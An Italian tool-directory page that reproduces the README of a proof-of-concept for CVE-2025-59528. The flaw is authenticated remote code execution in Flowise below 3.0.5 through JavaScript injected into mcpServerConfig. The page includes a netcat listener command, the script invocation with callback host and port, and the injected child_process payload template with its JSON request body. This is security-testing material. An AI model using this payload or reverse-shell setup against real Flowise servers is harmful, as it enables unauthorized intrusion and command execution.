Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-59528 — Proof-of-concept minimo di RCE autenticato per CVE-2025-59528 che colpisce Flowise < 3.0.5 tramite iniezione di customMCP mcpServerConfig, con passaggi riproducibili per test di sicurezza autorizzati. | Kitploit
Strumenti/GitHubGitHub/im-nymii/cve-2025-59528
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubim-nymii/cve-2025-59528

CVE-2025-59528

Proof-of-concept minimo di RCE autenticato per CVE-2025-59528 che colpisce Flowise < 3.0.5 tramite iniezione di customMCP mcpServerConfig, con passaggi riproducibili per test di sicurezza autorizzati.

Vedi Repository
13 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Version francaise

CVE-2025-59528 Prova di Concetto

PoC minimo focalizzato sulla validazione tecnica della vulnerabilità in un ambiente autorizzato.

Prerequisiti

  • Devi avere un account utente sul dashboard Flowise di destinazione.
  • Devi avere una chiave API valida collegata a quell'account.
  • Devi avviare un listener sul tuo host di callback prima di eseguire il PoC (esempio: nc -lvn 4444).

Esempio di Utilizzo

Avvia prima il listener:

root@kitploit:~
nc -lvn 4444
root@kitploit:~
python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api YOUR_VALID_API_KEY

Sostituisci i valori con le impostazioni del tuo ambiente autorizzato.

Riepilogo CVE

  • Prodotto interessato: Flowise
  • Versioni interessate: inferiori alla 3.0.5
  • Tipo: Esecuzione di Codice Remoto (RCE)
  • Punto di ingresso: endpoint POST /api/v1/node-load-method/customMCP

Il problema deriva da come viene elaborato inputs.mcpServerConfig: questo valore viene interpretato in modo da consentire l'esecuzione di JavaScript lato server. In pratica, un attaccante autenticato può iniettare un'espressione che chiama child_process ed esegue un comando del sistema operativo.

Meccanismo di Sfruttamento

Il flusso di sfruttamento è:

  1. Costruisci una richiesta all'endpoint customMCP.
  2. Inserisci un'espressione JavaScript malevola in mcpServerConfig.
  3. Attiva process.mainModule.require('child_process').
  4. Esegui un comando del sistema operativo (exec/execSync).

Se accettata, il server esegue il comando nel proprio contesto di sistema.

Come Funziona Questo PoC (poc.py)

Lo script accetta quattro argomenti:

  • -d/--domain: dominio di destinazione
  • -lh/--host: IP di callback
  • -lp/--port: porta di callback
  • -A/--api: token API Bearer

Poi:

  1. Costruisce l'URL vulnerabile: http://<domain>/api/v1/node-load-method/customMCP
  2. Aggiunge l'intestazione Authorization: Bearer <token>
  3. Prepara un comando shell di callback
  4. Inietta quel comando in un'espressione JS:
root@kitploit:~
({
  x: (function () {
    const cp = process.mainModule.require("child_process");
    cp.exec("<commande>");
    return 1;
  })(),
});
  1. Invia questo JSON:
root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "<injected JS expression>"
  }
}
  1. Stampa lo stato HTTP e la risposta grezza per la validazione.

Perché Questo PoC È Migliore (vs EDB 52440)

Rispetto al PoC EDB (che esegue il login email/password, utilizza intestazioni simili a browser e un comando --cmd libero), questo script è migliore per una pura validazione del PoC:

  1. Più diretto: nessun flusso di login e meno rumore HTTP non necessario.
  2. Minore superficie di rottura: meno passaggi legati alla configurazione frontend/auth.
  3. Automazione CI-friendly: argomenti semplici e output rapido.
  4. Validazione più chiara: stato + corpo vengono stampati immediatamente.
  5. Focalizzato sul percorso CVE principale: iniezione di mcpServerConfig ed esecuzione lato server.

In breve: lo script EDB è una demo offensiva più generica, mentre questo PoC è più mirato per la riproducibilità tecnica.

Limitazioni Attuali

  • Presuppone che esista già un token API valido.
  • Nessuna modalità https o gestione dei certificati.
  • Nessuna logica di retry/backoff.
  • Il comando di callback è hardcoded (non ancora parametrizzato tramite --cmd).

Uso Responsabile

Testa solo su sistemi di tua proprietà o dove hai autorizzazione esplicita.

Scarica lo strumento